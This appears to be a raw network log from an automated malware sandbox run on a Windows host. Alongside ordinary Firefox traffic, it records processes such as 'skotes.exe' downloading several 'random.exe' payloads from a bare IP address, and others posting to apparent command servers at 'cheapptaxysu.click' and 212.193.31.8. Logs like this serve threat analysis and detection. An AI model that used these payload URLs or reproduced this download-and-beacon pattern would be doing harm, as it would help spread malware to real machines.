                      prod.pocket.prod.cloudops.mozgcp.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      prod.pocket.prod.cloudops.mozgcp.net
                      IN A
                      Response
                      prod.pocket.prod.cloudops.mozgcp.net
                      IN A
                      34.120.5.221
                    • flag-us
                      GET
                      https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30
                      firefox.exe
                      Remote address:
                      34.120.5.221:443
                      Request
                      GET /v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30 HTTP/2.0
                      host: getpocket.cdn.mozilla.net
                      user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                      accept: */*
                      accept-language: en-US,en;q=0.5
                      accept-encoding: gzip, deflate, br
                      sec-fetch-dest: empty
                      sec-fetch-mode: cors
                      sec-fetch-site: cross-site
                      if-none-match: W/"55fb-EbQRG15WWp3OJ2XVah21nUrSQno"
                      te: trailers
                    • flag-us
                      DNS
                      youtube.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      youtube.com
                      IN A
                      Response
                      youtube.com
                      IN A
                      172.217.18.206
                    • flag-fr
                      GET
                      https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
                      firefox.exe
                      Remote address:
                      172.217.18.206:443
                      Request
                      GET /account?=https://accounts.google.com/v3/signin/challenge/pwd HTTP/2.0
                      host: youtube.com
                      user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                      accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                      accept-language: en-US,en;q=0.5
                      accept-encoding: gzip, deflate, br
                      upgrade-insecure-requests: 1
                      sec-fetch-dest: document
                      sec-fetch-mode: navigate
                      sec-fetch-site: none
                      sec-fetch-user: ?1
                      te: trailers
                    • flag-fr
                      GET
                      https://www.youtube.com/account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd
                      firefox.exe
                      Remote address:
                      172.217.18.206:443
                      Request
                      GET /account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd HTTP/2.0
                      host: www.youtube.com
                      user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                      accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                      accept-language: en-US,en;q=0.5
                      accept-encoding: gzip, deflate, br
                      upgrade-insecure-requests: 1
                      sec-fetch-dest: document
                      sec-fetch-mode: navigate
                      sec-fetch-site: none
                      sec-fetch-user: ?1
                      te: trailers
                    • flag-us
                      DNS
                      prod.ads.prod.webservices.mozgcp.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      prod.ads.prod.webservices.mozgcp.net
                      IN AAAA
                      Response
                    • flag-us
                      DNS
                      prod.pocket.prod.cloudops.mozgcp.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      prod.pocket.prod.cloudops.mozgcp.net
                      IN AAAA
                      Response
                      prod.pocket.prod.cloudops.mozgcp.net
                      IN AAAA
                      2600:1901:0:524c::
                    • flag-us
                      DNS
                      prod.pocket.prod.cloudops.mozgcp.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      prod.pocket.prod.cloudops.mozgcp.net
                      IN AAAA
                    • flag-us
                      DNS
                      youtube.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      youtube.com
                      IN AAAA
                      Response
                      youtube.com
                      IN AAAA
                      2a00:1450:4007:805::200e
                    • flag-us
                      DNS
                      youtube.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      youtube.com
                      IN AAAA
                    • flag-us
                      DNS
                      www.youtube.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      www.youtube.com
                      IN A
                      Response
                      www.youtube.com
                      IN CNAME
                      youtube-ui.l.google.com
                      youtube-ui.l.google.com
                      IN A
                      142.250.179.110
                      youtube-ui.l.google.com
                      IN A
                      172.217.18.206
                      youtube-ui.l.google.com
                      IN A
                      172.217.20.206
                      youtube-ui.l.google.com
                      IN A
                      216.58.215.46
                      youtube-ui.l.google.com
                      IN A
                      216.58.214.174
                      youtube-ui.l.google.com
                      IN A
                      142.250.179.78
                      youtube-ui.l.google.com
                      IN A
                      142.250.178.142
                      youtube-ui.l.google.com
                      IN A
                      172.217.20.174
                      youtube-ui.l.google.com
                      IN A
                      142.250.75.238
                      youtube-ui.l.google.com
                      IN A
                      142.250.201.174
                      youtube-ui.l.google.com
                      IN A
                      216.58.214.78
                    • flag-us
                      DNS
                      shavar.prod.mozaws.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      shavar.prod.mozaws.net
                      IN A
                      Response
                      shavar.prod.mozaws.net
                      IN A
                      44.228.225.150
                      shavar.prod.mozaws.net
                      IN A
                      44.240.87.158
                      shavar.prod.mozaws.net
                      IN A
                      52.40.120.141
                    • flag-us
                      DNS
                      shavar.prod.mozaws.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      shavar.prod.mozaws.net
                      IN A
                    • flag-us
                      DNS
                      prod.remote-settings.prod.webservices.mozgcp.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      prod.remote-settings.prod.webservices.mozgcp.net
                      IN A
                      Response
                      prod.remote-settings.prod.webservices.mozgcp.net
                      IN A
                      34.149.100.209
                    • flag-us
                      DNS
                      prod.remote-settings.prod.webservices.mozgcp.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      prod.remote-settings.prod.webservices.mozgcp.net
                      IN AAAA
                      Response
                    • flag-us
                      DNS
                      prod.remote-settings.prod.webservices.mozgcp.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      prod.remote-settings.prod.webservices.mozgcp.net
                      IN AAAA
                    • flag-us
                      DNS
                      shavar.prod.mozaws.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      shavar.prod.mozaws.net
                      IN AAAA
                      Response
                    • flag-us
                      DNS
                      youtube-ui.l.google.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      youtube-ui.l.google.com
                      IN A
                      Response
                      youtube-ui.l.google.com
                      IN A
                      142.250.178.142
                      youtube-ui.l.google.com
                      IN A
                      142.250.179.78
                      youtube-ui.l.google.com
                      IN A
                      216.58.214.78
                      youtube-ui.l.google.com
                      IN A
                      216.58.215.46
                      youtube-ui.l.google.com
                      IN A
                      142.250.75.238
                      youtube-ui.l.google.com
                      IN A
                      172.217.20.206
                      youtube-ui.l.google.com
                      IN A
                      216.58.214.174
                      youtube-ui.l.google.com
                      IN A
                      142.250.201.174
                      youtube-ui.l.google.com
                      IN A
                      142.250.179.110
                      youtube-ui.l.google.com
                      IN A
                      172.217.20.174
                      youtube-ui.l.google.com
                      IN A
                      172.217.18.206
                    • flag-us
                      DNS
                      youtube-ui.l.google.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      youtube-ui.l.google.com
                      IN A
                    • flag-us
                      DNS
                      youtube-ui.l.google.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      youtube-ui.l.google.com
                      IN A
                    • flag-us
                      DNS
                      youtube-ui.l.google.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      youtube-ui.l.google.com
                      IN A
                    • flag-us
                      DNS
                      prod.content-signature-chains.prod.webservices.mozgcp.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      prod.content-signature-chains.prod.webservices.mozgcp.net
                      IN A
                      Response
                      prod.content-signature-chains.prod.webservices.mozgcp.net
                      IN A
                      34.160.144.191
                    • flag-us
                      DNS
                      prod.content-signature-chains.prod.webservices.mozgcp.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      prod.content-signature-chains.prod.webservices.mozgcp.net
                      IN AAAA
                      Response
                      prod.content-signature-chains.prod.webservices.mozgcp.net
                      IN AAAA
                      2600:1901:0:92a9::
                    • flag-us
                      DNS
                      prod.content-signature-chains.prod.webservices.mozgcp.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      prod.content-signature-chains.prod.webservices.mozgcp.net
                      IN AAAA
                    • flag-us
                      DNS
                      youtube-ui.l.google.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      youtube-ui.l.google.com
                      IN AAAA
                      Response
                      youtube-ui.l.google.com
                      IN AAAA
                      2a00:1450:4007:808::200e
                      youtube-ui.l.google.com
                      IN AAAA
                      2a00:1450:4007:80e::200e
                      youtube-ui.l.google.com
                      IN AAAA
                      2a00:1450:4007:810::200e
                      youtube-ui.l.google.com
                      IN AAAA
                      2a00:1450:4007:80c::200e
                    • flag-us
                      DNS
                      consent.youtube.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      consent.youtube.com
                      IN A
                      Response
                      consent.youtube.com
                      IN A
                      142.250.179.110
                    • flag-us
                      DNS
                      consent.youtube.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      consent.youtube.com
                      IN A
                    • flag-us
                      DNS
                      consent.youtube.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      consent.youtube.com
                      IN A
                      Response
                      consent.youtube.com
                      IN A
                      142.250.179.110
                    • flag-us
                      DNS
                      consent.youtube.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      consent.youtube.com
                      IN A
                    • flag-us
                      DNS
                      consent.youtube.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      consent.youtube.com
                      IN A
                    • flag-fr
                      GET
                      https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1
                      firefox.exe
                      Remote address:
                      142.250.179.110:443
                      Request
                      GET /m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1 HTTP/2.0
                      host: consent.youtube.com
                      user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                      accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                      accept-language: en-US,en;q=0.5
                      accept-encoding: gzip, deflate, br
                      cookie: SOCS=CAAaBgiArZ27Bg
                      cookie: YSC=BVtFuk4jo0g
                      cookie: __Secure-YEC=CgtLNmJKVlZjb0kzSSjA8527BjIKCgJHQhIEGgAgXw%3D%3D
                      cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgXw%3D%3D
                      upgrade-insecure-requests: 1
                      sec-fetch-dest: document
                      sec-fetch-mode: navigate
                      sec-fetch-site: none
                      sec-fetch-user: ?1
                      te: trailers
                    • flag-us
                      DNS
                      www.google.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      www.google.com
                      IN A
                      Response
                      www.google.com
                      IN A
                      172.217.20.164
                    • flag-us
                      DNS
                      www.google.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      www.google.com
                      IN A
                      Response
                      www.google.com
                      IN A
                      172.217.20.164
                    • flag-us
                      DNS
                      www.google.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      www.google.com
                      IN A
                    • flag-us
                      DNS
                      www.google.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      www.google.com
                      IN AAAA
                      Response
                      www.google.com
                      IN AAAA
                      2a00:1450:4007:80c::2004
                    • flag-us
                      DNS
                      consent.youtube.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      consent.youtube.com
                      IN AAAA
                      Response
                      consent.youtube.com
                      IN AAAA
                      2a00:1450:4007:818::200e
                    • flag-us
                      DNS
                      consent.youtube.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      consent.youtube.com
                      IN AAAA
                    • flag-us
                      DNS
                      consent.youtube.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      consent.youtube.com
                      IN AAAA
                    • flag-us
                      DNS
                      prod.balrog.prod.cloudops.mozgcp.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      prod.balrog.prod.cloudops.mozgcp.net
                      IN A
                      Response
                      prod.balrog.prod.cloudops.mozgcp.net
                      IN A
                      35.244.181.201
                    • flag-us
                      DNS
                      prod.balrog.prod.cloudops.mozgcp.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      prod.balrog.prod.cloudops.mozgcp.net
                      IN AAAA
                      Response
                    • flag-us
                      DNS
                      prod.balrog.prod.cloudops.mozgcp.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      prod.balrog.prod.cloudops.mozgcp.net
                      IN AAAA
                    • flag-us
                      DNS
                      ciscobinary.openh264.org
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      ciscobinary.openh264.org
                      IN A
                      Response
                      ciscobinary.openh264.org
                      IN CNAME
                      a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com
                      a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com
                      IN CNAME
                      a17.rackcdn.com
                      a17.rackcdn.com
                      IN CNAME
                      a17.rackcdn.com.mdc.edgesuite.net
                      a17.rackcdn.com.mdc.edgesuite.net
                      IN CNAME
                      a19.dscg10.akamai.net
                      a19.dscg10.akamai.net
                      IN A
                      88.221.134.155
                      a19.dscg10.akamai.net
                      IN A
                      88.221.134.209
                    • flag-us
                      DNS
                      a19.dscg10.akamai.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      a19.dscg10.akamai.net
                      IN A
                      Response
                      a19.dscg10.akamai.net
                      IN A
                      88.221.134.155
                      a19.dscg10.akamai.net
                      IN A
                      88.221.134.209
                    • flag-us
                      DNS
                      a19.dscg10.akamai.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      a19.dscg10.akamai.net
                      IN A
                    • flag-gb
                      GET
                      http://ciscobinary.openh264.org/openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip
                      firefox.exe
                      Remote address:
                      88.221.134.155:80
                      Request
                      GET /openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip HTTP/1.1
                      Host: ciscobinary.openh264.org
                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                      Accept: */*
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Connection: keep-alive
                      Response
                      HTTP/1.1 200 OK
                      Last-Modified: Fri, 08 Nov 2024 02:52:28 GMT
                      ETag: 85430baed3398695717b0263807cf97c
                      Content-Length: 453023
                      Accept-Ranges: bytes
                      X-Timestamp: 1731034347.00215
                      Content-Type: application/zip
                      X-Trans-Id: tx264693c458e9421d8a991-006730bfe7dfw1
                      Cache-Control: public, max-age=92616
                      Expires: Mon, 23 Dec 2024 04:14:13 GMT
                      Date: Sun, 22 Dec 2024 02:30:37 GMT
                      Connection: keep-alive
                    • flag-us
                      DNS
                      a19.dscg10.akamai.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      a19.dscg10.akamai.net
                      IN AAAA
                      Response
                      a19.dscg10.akamai.net
                      IN AAAA
                      2a02:26f0:a1::58dd:869b
                      a19.dscg10.akamai.net
                      IN AAAA
                      2a02:26f0:a1::58dd:86d1
                    • flag-us
                      DNS
                      redirector.gvt1.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      redirector.gvt1.com
                      IN A
                      Response
                      redirector.gvt1.com
                      IN A
                      172.217.20.174
                    • flag-us
                      DNS
                      redirector.gvt1.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      redirector.gvt1.com
                      IN A
                      Response
                      redirector.gvt1.com
                      IN A
                      172.217.20.174
                    • flag-us
                      DNS
                      redirector.gvt1.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      redirector.gvt1.com
                      IN A
                    • flag-us
                      DNS
                      redirector.gvt1.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      redirector.gvt1.com
                      IN AAAA
                      Response
                      redirector.gvt1.com
                      IN AAAA
                      2a00:1450:4007:80c::200e
                    • flag-us
                      DNS
                      r4---sn-aigzrnsz.gvt1.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      r4---sn-aigzrnsz.gvt1.com
                      IN A
                      Response
                      r4---sn-aigzrnsz.gvt1.com
                      IN CNAME
                      r4.sn-aigzrnsz.gvt1.com
                      r4.sn-aigzrnsz.gvt1.com
                      IN A
                      74.125.175.169
                    • flag-us
                      DNS
                      r4.sn-aigzrnsz.gvt1.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      r4.sn-aigzrnsz.gvt1.com
                      IN A
                      Response
                      r4.sn-aigzrnsz.gvt1.com
                      IN A
                      74.125.175.169
                    • flag-us
                      DNS
                      r4.sn-aigzrnsz.gvt1.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      r4.sn-aigzrnsz.gvt1.com
                      IN AAAA
                      Response
                      r4.sn-aigzrnsz.gvt1.com
                      IN AAAA
                      2a00:1450:4009:1b::9
                    • flag-us
                      DNS
                      firefox-settings-attachments.cdn.mozilla.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      firefox-settings-attachments.cdn.mozilla.net
                      IN A
                      Response
                      firefox-settings-attachments.cdn.mozilla.net
                      IN CNAME
                      attachments.prod.remote-settings.prod.webservices.mozgcp.net
                      attachments.prod.remote-settings.prod.webservices.mozgcp.net
                      IN A
                      34.117.121.53
                    • flag-us
                      DNS
                      attachments.prod.remote-settings.prod.webservices.mozgcp.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      attachments.prod.remote-settings.prod.webservices.mozgcp.net
                      IN A
                      Response
                      attachments.prod.remote-settings.prod.webservices.mozgcp.net
                      IN A
                      34.117.121.53
                    • flag-us
                      DNS
                      attachments.prod.remote-settings.prod.webservices.mozgcp.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      attachments.prod.remote-settings.prod.webservices.mozgcp.net
                      IN AAAA
                      Response
                    • flag-us
                      DNS
                      consent.youtube.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      consent.youtube.com
                      IN A
                      Response
                      consent.youtube.com
                      IN A
                      142.250.179.110
                    • flag-us
                      DNS
                      consent.youtube.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      consent.youtube.com
                      IN A
                      Response
                      consent.youtube.com
                      IN A
                      142.250.179.110
                    • flag-ru
                      GET
                      http://31.41.244.11/files/burpin1/random.exe
                      skotes.exe
                      Remote address:
                      31.41.244.11:80
                      Request
                      GET /files/burpin1/random.exe HTTP/1.1
                      Host: 31.41.244.11
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sun, 22 Dec 2024 02:30:49 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 4438776
                      Last-Modified: Tue, 10 Dec 2024 00:01:52 GMT
                      Connection: keep-alive
                      ETag: "675784f0-43baf8"
                      Accept-Ranges: bytes
                    • flag-ru
                      GET
                      http://31.41.244.11/files/geopoxid/random.exe
                      skotes.exe
                      Remote address:
                      31.41.244.11:80
                      Request
                      GET /files/geopoxid/random.exe HTTP/1.1
                      Host: 31.41.244.11
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sun, 22 Dec 2024 02:31:00 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 1861632
                      Last-Modified: Thu, 19 Dec 2024 20:35:58 GMT
                      Connection: keep-alive
                      ETag: "676483ae-1c6800"
                      Accept-Ranges: bytes
                    • flag-ru
                      GET
                      http://31.41.244.11/files/zhigarko/random.exe
                      skotes.exe
                      Remote address:
                      31.41.244.11:80
                      Request
                      GET /files/zhigarko/random.exe HTTP/1.1
                      Host: 31.41.244.11
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sun, 22 Dec 2024 02:31:14 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 439296
                      Last-Modified: Sat, 21 Dec 2024 08:14:10 GMT
                      Connection: keep-alive
                      ETag: "676678d2-6b400"
                      Accept-Ranges: bytes
                    • flag-ru
                      GET
                      http://31.41.244.11/files/kardanvalov88/random.exe
                      skotes.exe
                      Remote address:
                      31.41.244.11:80
                      Request
                      GET /files/kardanvalov88/random.exe HTTP/1.1
                      Host: 31.41.244.11
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sun, 22 Dec 2024 02:31:18 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 605696
                      Last-Modified: Thu, 12 Dec 2024 15:01:10 GMT
                      Connection: keep-alive
                      ETag: "675afab6-93e00"
                      Accept-Ranges: bytes
                    • flag-ru
                      GET
                      http://31.41.244.11/files/martin/random.exe
                      skotes.exe
                      Remote address:
                      31.41.244.11:80
                      Request
                      GET /files/martin/random.exe HTTP/1.1
                      Host: 31.41.244.11
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sun, 22 Dec 2024 02:31:22 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 4457984
                      Last-Modified: Sun, 22 Dec 2024 02:13:51 GMT
                      Connection: keep-alive
                      ETag: "676775df-440600"
                      Accept-Ranges: bytes
                    • flag-us
                      DNS
                      play.google.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      play.google.com
                      IN A
                      Response
                      play.google.com
                      IN A
                      216.58.214.174
                    • flag-us
                      DNS
                      cheapptaxysu.click
                      ef0449806c.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      cheapptaxysu.click
                      IN A
                      Response
                      cheapptaxysu.click
                      IN A
                      172.67.177.88
                      cheapptaxysu.click
                      IN A
                      104.21.67.146
                    • flag-fr
                      POST
                      https://play.google.com/log?hasfast=true&authuser=0&format=json
                      firefox.exe
                      Remote address:
                      216.58.214.174:443
                      Request
                      POST /log?hasfast=true&authuser=0&format=json HTTP/2.0
                      host: play.google.com
                      user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                      accept: */*
                      accept-language: en-US,en;q=0.5
                      accept-encoding: gzip, deflate, br
                      referer: https://consent.youtube.com/
                      content-type: text/plain;charset=UTF-8
                      content-length: 777
                      origin: https://consent.youtube.com
                      sec-fetch-dest: empty
                      sec-fetch-mode: no-cors
                      sec-fetch-site: cross-site
                      te: trailers
                    • flag-us
                      DNS
                      play.google.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      play.google.com
                      IN A
                      Response
                      play.google.com
                      IN A
                      216.58.214.174
                    • flag-us
                      POST
                      https://cheapptaxysu.click/api
                      ef0449806c.exe
                      Remote address:
                      172.67.177.88:443
                      Request
                      POST /api HTTP/1.1
                      Connection: Keep-Alive
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                      Content-Length: 8
                      Host: cheapptaxysu.click
                      Response
                      HTTP/1.1 403 Forbidden
                      Date: Sun, 22 Dec 2024 02:31:13 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      X-Frame-Options: SAMEORIGIN
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VsxBC30Z6k79B4PY1TkUxzET1r4vQRYifBa%2ByrfGGgK3cjPK5lVwTkYRT52BPIZvSutQrTEJrPD%2FxNW0fsgILNu6McmApA4Dovq5jlZTmpD5Ki6MZuoiXZTDofi3rhvgTp2QEQ4%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 8f5cb1c3fa10ef56-LHR
                    • flag-us
                      POST
                      https://cheapptaxysu.click/api
                      ef0449806c.exe
                      Remote address:
                      172.67.177.88:443
                      Request
                      POST /api HTTP/1.1
                      Connection: Keep-Alive
                      Content-Type: application/x-www-form-urlencoded
                      Cookie: __cf_mw_byp=.bmSsGrZrbfsHxUAF4YuOnltV.TMahgqUlmYN4mupfY-1734834673-0.0.1.1-/api
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                      Content-Length: 50
                      Host: cheapptaxysu.click
                      Response
                      HTTP/1.1 200 OK
                      Date: Sun, 22 Dec 2024 02:31:13 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Set-Cookie: PHPSESSID=21qtudenp4eh8ko53e024dvibo; expires=Wed, 16 Apr 2025 20:17:52 GMT; Max-Age=9999999; path=/
                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                      Cache-Control: no-store, no-cache, must-revalidate
                      Pragma: no-cache
                      X-Frame-Options: DENY
                      X-Content-Type-Options: nosniff
                      X-XSS-Protection: 1; mode=block
                      cf-cache-status: DYNAMIC
                      vary: accept-encoding
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q2FhiIC3N8%2FMQ4WwLswkhSTyuXGDU8X3JvgGtnBRsX%2B6APjHWhfaL00Ruy32zHerzjYGc3Dg2mq4aKBl%2Bifl4rRd0t98p9HsUQjhrfbOSJI3ZPo8FgP%2BfCZC6z5Zy1%2Bqefh%2Be4A%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 8f5cb1c45aa2ef56-LHR
                      alt-svc: h3=":443"; ma=86400
                      server-timing: cfL4;desc="?proto=TCP&rtt=67539&min_rtt=48114&rtt_var=32925&sent=15&recv=10&lost=0&retrans=0&sent_bytes=8133&recv_bytes=1060&delivery_rate=224780&cwnd=253&unsent_bytes=0&cid=2fa6c3d1abd8c8cf&ts=419&x=0"
                    • flag-us
                      DNS
                      play.google.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      play.google.com
                      IN AAAA
                      Response
                      play.google.com
                      IN AAAA
                      2a00:1450:4007:80e::200e
                    • flag-hu
                      POST
                      http://212.193.31.8/3ofn3jf3e2ljk2/index.php
                      Gxtuum.exe
                      Remote address:
                      212.193.31.8:80
                      Request
                      POST /3ofn3jf3e2ljk2/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 212.193.31.8
                      Content-Length: 4
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Date: Sun, 22 Dec 2024 02:31:18 GMT
                      Server: Apache/2.4.58 (Ubuntu)
                      Content-Length: 8
                      Content-Type: text/html; charset=UTF-8
                    • flag-hu
                      POST
                      http://212.193.31.8/3ofn3jf3e2ljk2/index.php
                      Gxtuum.exe
                      Remote address:
                      212.193.31.8:80
                      Request
                      POST /3ofn3jf3e2ljk2/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 212.193.31.8
                      Content-Length: 156
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Date: Sun, 22 Dec 2024 02:31:19 GMT
                      Server: Apache/2.4.58 (Ubuntu)
                      Content-Length: 7
                      Content-Type: text/html; charset=UTF-8
                    • flag-us
                      DNS
                      drive.google.com
                      df1fc80896.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      drive.google.com
                      IN A
                      Response
                      drive.google.com
                      IN A
                      142.250.75.238
                    • flag-fr
                      GET
                      https://drive.google.com/uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download
                      df1fc80896.exe
                      Remote address:
                      142.250.75.238:443
                      Request
                      GET /uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1
                      User-Agent: FileDownloader
                      Host: drive.google.com
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 303 See Other
                      Content-Type: application/binary
                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                      Pragma: no-cache
                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                      Date: Sun, 22 Dec 2024 02:31:26 GMT
                      Location: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download
                      Strict-Transport-Security: max-age=31536000
                      Content-Security-Policy: script-src 'report-sample' 'nonce-QGp1q-9Gt_LgMXUrhlIttw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
